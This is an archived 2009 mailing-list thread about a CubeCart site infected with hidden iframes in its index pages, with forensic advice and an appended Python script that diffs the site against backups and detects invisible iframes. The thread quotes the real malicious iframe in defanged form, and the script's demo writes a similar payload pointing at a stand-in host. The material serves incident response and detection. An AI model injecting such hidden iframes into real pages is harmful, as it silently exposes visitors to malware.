[thelist] Server hacked?

Daniel Burke dan.p.burke at gmail.com
Fri Jul 10 05:38:09 CDT 2009

This is something I'm pretty sure you're going to have to figure out
yourself. There are a number of ways of doing this; personally, I would
do this...

Determine when it was compromised (to the millisecond if possible).
Start comparing your backups (you have lots of them, don't you?). If
the hack is really lame, the timestamps on the files will reflect the
hack attempt. I wouldn't bet on it.

Now that you know the time of the hack, analyse the logs for the
suspect time period. You have very detailed logs going back at least a
month, right?

If that doesn't help, consider the possible points of entry, in order
of least to most likely...

1. Vulnerability in a network service you are running
2. Vulnerability in PHP.
3. Vulnerability in your server configuration.
4. Vulnerability in cube cart.
5. Vulnerability in your php code.
6. Password was compromised through a keylogger.

Points 1 and 2 can be (almost) ruled out after you have diffed your
backups and verified that this site is the only part that has changed.

PHP is a very popular language; it has attracted a lot of people, most
of whom should not be writing code. A significant portion of PHP
programmers are new to programming and don't understand everything
involved. Most people, when they've been using PHP for a while, will
move on to a different language, one that doesn't have so many ways to
shoot yourself in the foot or several functions that do the exact same
thing (or, as I have, a language that allows you to blow off your whole
leg and most of the town you're living in; see sig).

The point I'm trying to make is, PHP is the VB of web servers.
Consider anything PHP to be highly suspect unless you wrote it
yourself, and you've been doing it for at least 3 years with a strong
eye on security. And even then I'd be suspicious.

I'll bet your client got a keylogger on their machine. Check your
logs, and listen to the hornets' nest that I no doubt have stirred up with
this reply. There are a lot of folks on this list who know an awful
lot more about this stuff than I.

If you haven't already, consider checking out some of the hardened
versions of PHP for the future. As a "programmable hypertext
preprocessor" PHP can do way too much stuff that is a total security
risk. Securing PHP is a book in itself.


"It's your privilege as an artist to inflict the pain of creativity on
yourself." --Programming Perl 3rd Edition, end of first chapter.

On Fri, Jul 10, 2009 at 7:12 PM, Sales @ Lycosa<sales at lycosa.co.uk> wrote:
> Hi, I just had a scary moment, and I thought my server had been compromised.
> It turns out that just one site had been compromised, with the injection of
> the following code into all the index pages within each directory of the
> site. (I have added spaces to prevent the link delivering its payload).
> i_f_r_a_m_e  s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 "
> width=125 height=125 style="visibility: hidden"
> The site runs cube cart, and I suspect a Trojan was somehow added to the
> review pages of the site. No passwords were altered, so I am assuming this
> is the work of a script. I take the security of my servers very seriously,
> and I take steps to maintain their integrity, but this is a new one for me.
> Also, according to my customer, his site has been listed as dangerous with
> Google.
> My question is this: how did a script infect my server without a
> username/password, and how do I prevent this happening again?
> [ I have researched Google, and sent a support ticket to my hosting company,
> but nothing yet ]
> Thanks.
> Phil Parker
> Kind regards,
> Phil Parker
> Lycosa Web Services Ltd,
> 47 Hilderthorpe Road,
> Bridlington,
> East Yorkshire.
> YO15 3AZ.
> Tel: 01262 42 42 99
> Email:  <mailto:sales at lycosa.co.uk> sales at lycosa.co.uk
> Web:  <http://www.lycosa.co.uk> http://www.lycosa.co.uk
> Registered in England and Wales company no. 04614248
> ------------------------------------------------------------------------
> ------------------------------------------------------------------------
> Disclaimer: The information in this email is confidential and is intended
> solely for the use of the addressee. If you are not the intended recipient
> of this email you have received it in error and any disclosure, copying or
> distribution is strictly prohibited.
> Any quotation or estimate is valid for 30 days from the date of this email.
> E. & O. E.

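The triage Daniel describes above (pin down when the site was changed, diff the live tree against a backup, then pull the access logs for that window) is easy to get wrong by hand across dozens of index pages. The script below is an added example written for this archive page; it is not code from either message in the thread. It walks a live web root, compares each HTML/PHP file with its copy in a backup tree, flags any `<iframe>` styled to be invisible (as in the `visibility: hidden` 125x125 frame Phil found), lists the lines that were added relative to the backup, and reports the earliest and latest modification time among the hits so you know which slice of the logs to read. The sample site it builds, the hostname `malware.invalid` in the payload, and the modification timestamp are all constructed for the demo.

```python
"""Incident triage helper: diff a live web root against a known-good backup,
flag injected hidden iframes, and report the mtime window to search in the logs.
Added example for this archive page, not code from the thread."""
import os
import re
import tempfile
import difflib
from datetime import datetime, timezone

WEB_EXTS = {".html", ".htm", ".php"}

# One iframe tag at a time; the hidden-ness check runs on the same tag text.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)\s*=\s*[\"']?0\b",
    re.IGNORECASE,
)

# Constructed timestamp for the demo injection: 2009-07-10 01:40:00 UTC.
INJECT_TS = 1247190000


def injected_iframes(html):
    """Return the src of every iframe in html that is styled so the user cannot see it."""
    hits = []
    for tag in IFRAME_RE.finditer(html):
        tag_text = tag.group(0)
        if HIDDEN_RE.search(tag_text):
            m = SRC_RE.search(tag_text)
            hits.append(m.group(1) if m else "<no src>")
    return hits


def added_lines(old, new):
    """Lines present in new but absent from old ('+' lines of a unified diff, headers dropped)."""
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]


def scan_site(live_root, backup_root):
    """Compare every web file under live_root with the same path under backup_root.

    A file is reported if it differs from (or is missing in) the backup, or if it
    carries a hidden iframe regardless of the backup state."""
    findings = []
    for dirpath, _, files in os.walk(live_root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTS:
                continue
            live_path = os.path.join(dirpath, name)
            rel = os.path.relpath(live_path, live_root).replace(os.sep, "/")
            backup_path = os.path.join(backup_root, rel)
            with open(live_path, encoding="utf-8", errors="replace") as f:
                live = f.read()
            backup = None
            if os.path.exists(backup_path):
                with open(backup_path, encoding="utf-8", errors="replace") as f:
                    backup = f.read()
            iframes = injected_iframes(live)
            changed = backup is None or backup != live
            if not iframes and not changed:
                continue
            mtime = datetime.fromtimestamp(os.path.getmtime(live_path), tz=timezone.utc)
            findings.append({
                "path": rel,
                "mtime": mtime.isoformat(),
                "in_backup": backup is not None,
                "iframes": iframes,
                "added": added_lines(backup or "", live),
            })
    return findings


def log_window(findings):
    """Earliest and latest mtime among the hits: the span to pull from the access logs.
    Caveat: an attacker can reset mtimes, so this narrows the search but proves nothing."""
    if not findings:
        return None
    times = sorted(f["mtime"] for f in findings)
    return times[0], times[-1]


def build_demo():
    """Constructed sample site: two injected index pages plus one untouched page."""
    base = tempfile.mkdtemp()
    live, backup = os.path.join(base, "live"), os.path.join(base, "backup")
    clean = "<html><body><h1>Shop</h1><p>Welcome</p></body></html>\n"
    payload = ('<iframe src="http://malware.invalid:8080/ts/in.cgi?x" width=125 '
               'height=125 style="visibility: hidden"></iframe>\n')
    injected = {"index.html", "reviews/index.php"}
    for rel in ("index.html", "reviews/index.php", "about.html"):
        for root in (live, backup):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            body = clean + payload if (root == live and rel in injected) else clean
            with open(path, "w", encoding="utf-8") as f:
                f.write(body)
            if root == live and rel in injected:
                os.utime(path, (INJECT_TS, INJECT_TS))  # simulate the defacement time
    return live, backup


if __name__ == "__main__":
    live_root, backup_root = build_demo()
    for hit in scan_site(live_root, backup_root):
        print(hit["path"], hit["mtime"], hit["iframes"])
    print("log window:", log_window(scan_site(live_root, backup_root)))
```

Run it against your real tree as `scan_site("/var/www/site", "/backups/site-2009-07-01")` (paths are assumptions) and feed the reported window to `grep` on the access log; the POST or GET that wrote those files, and the IP behind it, is usually a few lines away from that timestamp. The same check can be done from the shell with `diff -r` and `find -newermt`, but the script also tells you what was added, which is the string to search the rest of the server for.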